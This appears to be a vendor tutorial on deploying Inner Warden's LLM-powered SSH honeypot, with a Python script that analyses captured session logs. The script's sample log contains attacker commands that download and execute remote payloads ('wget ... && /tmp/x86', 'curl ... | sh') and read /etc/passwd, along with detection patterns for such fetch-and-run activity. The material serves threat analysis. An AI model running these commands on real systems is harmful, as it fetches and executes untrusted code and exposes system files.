How to Set Up an SSH Honeypot That Captures Attacker Behavior
Blocking attackers is the first layer. Watching them is the second. A honeypot is a fake service that looks real enough to draw an attacker into interacting with it while you record everything they do: the credentials they try, the commands they run, the tools they attempt to download.
Traditional honeypots are static. They return canned responses that an experienced attacker recognizes quickly. Inner Warden takes a different approach: the honeypot shell is powered by an LLM that generates realistic responses in real time. The attacker believes they have a live shell. They do not.
Why run a honeypot?
Most security tools tell you that an attacker tried to get in. A honeypot tells you what they planned to do once inside. That difference matters:
- Capture credentials - see which username/password pairs are being tried. If your real passwords show up, you have a leak.
- Record TTPs - the commands an attacker runs reveal their tooling, targets, and skill level. This is threat intelligence you cannot buy.
- Waste attacker time - every second spent in a honeypot is a second not spent attacking real infrastructure.
- Early warning - honeypot activity confirms active targeting. If someone is probing your honeypot, they have already found your server.
How Inner Warden's honeypot works
Inner Warden includes a built-in SSH honeypot that listens on port 2222 by default. An attacker who connects sees what looks like a real SSH login prompt. Any credentials are accepted, so every login attempt succeeds and drops the attacker into a fake shell.
The shell is not scripted. Its output is generated by the configured AI provider, which simulates a realistic Linux environment: run ls and get a directory listing, run cat /etc/passwd and get a plausible file, run wget and the honeypot pretends to download. Nothing is actually fetched or executed on the host; the command and the URL it names are recorded. Every interaction is logged, and because the provider generates each response, the commands the attacker types are sent to it.
Real session from production
Here is a real honeypot session captured on our production server. The attacker IP was 203.0.113.55.
The "tyty" command is interesting. It suggests the attacker was testing if the shell was responsive before running their real payload. They never got the chance. The session was logged, the IP was blocked, and the credentials they tried were recorded for analysis.
What you learn from honeypot data
After running the honeypot for a few weeks, patterns emerge:
- Top credential pairs - which username/password combinations are being tried most. If any match real accounts, change them immediately.
- Post-compromise playbooks - the first commands attackers run reveal their goals. Crypto miners download from specific URLs. Botnet agents check for specific processes. Ransomware looks for specific file types.
- Attacker origins - GeoIP and ASN data across honeypot sessions shows which hosting providers and regions are targeting you.
- Time patterns - the hours when attacks peak point to the attacker's timezone or to an automated scanner's schedule.
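Once the honeypot has been running for a while, these patterns can be pulled from its session log with a short script. The following is an added example and not Inner Warden's own code: it assumes a JSON-lines log format (one event per line with ts, session, src_ip and event fields, plus user/password for logins and line for commands), which is an assumption rather than the product's real format, and it runs over constructed sample events that use documentation IP ranges.

```python
"""Mine honeypot session events for the patterns listed above.

Added example, not Inner Warden's own code. Assumed (not the product's) log
format: one JSON object per line with ts, session, src_ip, event; a "login"
event also carries user and password, a "cmd" event carries line.
"""
import json
import re
from collections import Counter
from datetime import datetime

# Constructed sample log in the assumed format; the last line is deliberately damaged.
SAMPLE_LOG = r"""
{"ts": "2024-05-01T02:14:09Z", "session": "s1", "src_ip": "203.0.113.55", "event": "login", "user": "root", "password": "123456"}
{"ts": "2024-05-01T02:14:11Z", "session": "s1", "src_ip": "203.0.113.55", "event": "cmd", "line": "tyty"}
{"ts": "2024-05-01T02:14:15Z", "session": "s1", "src_ip": "203.0.113.55", "event": "cmd", "line": "wget http://198.51.100.7/x86 -O /tmp/x86"}
{"ts": "2024-05-01T02:14:18Z", "session": "s1", "src_ip": "203.0.113.55", "event": "cmd", "line": "chmod +x /tmp/x86 && /tmp/x86"}
{"ts": "2024-05-01T02:40:02Z", "session": "s2", "src_ip": "198.51.100.23", "event": "login", "user": "admin", "password": "admin"}
{"ts": "2024-05-01T02:40:03Z", "session": "s2", "src_ip": "198.51.100.23", "event": "cmd", "line": "uname -a"}
{"ts": "2024-05-01T02:40:05Z", "session": "s2", "src_ip": "198.51.100.23", "event": "cmd", "line": "cat /proc/cpuinfo | grep 'model name'"}
{"ts": "2024-05-01T14:05:44Z", "session": "s3", "src_ip": "203.0.113.55", "event": "login", "user": "root", "password": "123456"}
{"ts": "2024-05-01T14:05:46Z", "session": "s3", "src_ip": "203.0.113.55", "event": "cmd", "line": "curl -s http://198.51.100.7/kthreadd | sh"}
{"ts": "2024-05-02T02:11:30Z", "session": "s4", "src_ip": "192.0.2.77", "event": "login", "user": "root", "password": "123456"}
{"ts": "2024-05-02T02:11:31Z", "session": "s4", "src_ip": "192.0.2.77", "event": "cmd", "line": "ps aux | grep -v grep | grep xmrig"}
{"ts": "2024-05-02T02:50:10Z", "session": "s5", "src_ip": "192.0.2.80", "event": "login", "user": "admin", "password": "admin"}
{"ts": "2024-05-02T02:50:12Z", "session": "s5", "src_ip": "192.0.2.80", "event": "cmd", "line": "cat /etc/passwd"}
{"ts": "2024-05-02T03:00:00Z", "session": "s6", "src_ip": "192.0.2.78", "event": "login", "user": "deploy", "password": "S3cretD3ploy"}
{"ts": "2024-05-02T03:00:01Z", "session": "s6", "src_ip": "192.0.2.78", "event": "cmd", "line": "id"}
garbage left behind by log rotation
"""

URL_RE = re.compile(r"https?://[^\s'\"|;&]+")
EXEC_RE = re.compile(r"\|\s*(sh|bash)\b|chmod\s+\+x")  # a fetched payload being run

def parse_log(text):
    """Return the valid events; a damaged line is skipped, not fatal."""
    events = []
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and all(k in ev for k in ("session", "event")):
            events.append(ev)
    return events

def logins(events):
    return [e for e in events if e["event"] == "login"]

def commands(events):
    return [e for e in events if e["event"] == "cmd"]

def top_credentials(events, n=3):
    """Most-tried username/password pairs."""
    return Counter((e["user"], e["password"]) for e in logins(events)).most_common(n)

def tried_real_accounts(events, real_accounts):
    """Usernames tried that exist on the real host. Check passwords against
    your password store; never keep real passwords in plaintext in a script."""
    return sorted({e["user"] for e in logins(events)} & set(real_accounts))

def first_commands(events):
    """First command of each session: the attacker's post-login intent."""
    first = {}
    for e in commands(events):
        first.setdefault(e["session"], e["line"])
    return first

def fetch_urls(events):
    """URLs the fake shell was asked to fetch (nothing was downloaded);
    they are block-list and intel-sharing material."""
    urls = Counter()
    for e in commands(events):
        urls.update(URL_RE.findall(e["line"]))
    return urls

def fetch_and_run_sessions(events):
    """Sessions that fetch a payload and execute it: miner/bot drop-and-run."""
    fetched = {e["session"] for e in commands(events) if URL_RE.search(e["line"])}
    executed = {e["session"] for e in commands(events) if EXEC_RE.search(e["line"])}
    return sorted(fetched & executed)

def sessions_by_hour(events):
    """Sessions opened per UTC hour, to spot automation schedules."""
    stamps = (datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ") for e in logins(events))
    return Counter(t.hour for t in stamps)

def top_sources(events, n=3):
    """Source IPs by session count, the input for GeoIP/ASN lookups."""
    return Counter(e["src_ip"] for e in logins(events)).most_common(n)

if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("credentials:", top_credentials(ev))
    print("real accounts tried:", tried_real_accounts(ev, {"deploy", "alice"}))
    print("fetch URLs:", dict(fetch_urls(ev)))
    print("fetch-and-run sessions:", fetch_and_run_sessions(ev))
    print("sessions by hour:", dict(sorted(sessions_by_hour(ev).items())))
    print("top sources:", top_sources(ev))
```

Run it as a script to print each summary, or import it and point parse_log at your own log once the field names match what the honeypot actually writes. On the constructed sample, root:123456 is the top pair, the deploy account is flagged as a real username being tried, sessions s1 and s3 both fetch a payload and run it, and four of the six sessions open in the 02:00 UTC hour, which is the kind of clustering that points to a scheduled scanner rather than a person.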
Set it up
Install Inner Warden. The honeypot is part of the agent and starts automatically when enabled.
curl -fsSL https://innerwarden.com/install | sudo bash
If you would rather not pipe a remote script straight into a root shell, download the installer first, read it, and then run it. Next, configure an AI provider so the honeypot can generate realistic responses:
innerwarden configure ai
The honeypot listens on port 2222 by default; you can change this in the configuration. For best results, either redirect port 22 to 2222 on a secondary IP address so the honeypot answers on the standard port, or move your real SSH daemon to a non-standard port. If you move the real daemon, open the new port in the firewall and confirm you can log in over it from a second session before closing the one you are in.
Verify it is running:
innerwarden status
What to do next
A honeypot works best alongside active defense. Pair it with:
- SSH brute-force detection - block attackers at the firewall before they reach the honeypot, or let the honeypot catch the ones that slip through.
- Threat intelligence sharing - report honeypot visitors to AbuseIPDB so other servers get advance warning.
- Telegram notifications - get alerts when an attacker enters the honeypot. Set up with innerwarden notify telegram.